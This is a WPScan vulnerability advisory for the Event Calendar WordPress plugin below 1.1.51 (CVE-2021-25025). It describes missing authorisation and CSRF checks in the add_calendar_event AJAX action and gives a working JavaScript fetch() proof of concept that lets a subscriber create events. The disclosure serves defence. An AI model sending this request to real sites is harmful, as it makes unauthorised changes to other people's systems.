WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Event Calendar < 1.1.51 - Subscriber+ Event Creation

Description

The plugin does not have proper authorisation and CSRF checks in the add_calendar_event AJAX actions, allowing users with a role as low as subscriber to create events

Proof of Concept

Adding calendar events:
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action": "add_calendar_event", "ecwd_calendar_id": 4, "ecwd_event_name": "An opening", "ecwd_date_from": "2021/11/01", "ecwd_date_to": "2022/11/01"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

event-calendar-wd
Fixed in version 1.1.51

References

CVE
CVE-2021-25025

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc
Verified

Yes

WPVDB ID
24fb4eb4-9fe1-4433-8844-8904eaf13c0e

Timeline

Publicly Published

2021-12-20 (about 9 months ago)

Added

2021-12-20 (about 9 months ago)

Last Updated

2022-04-16 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin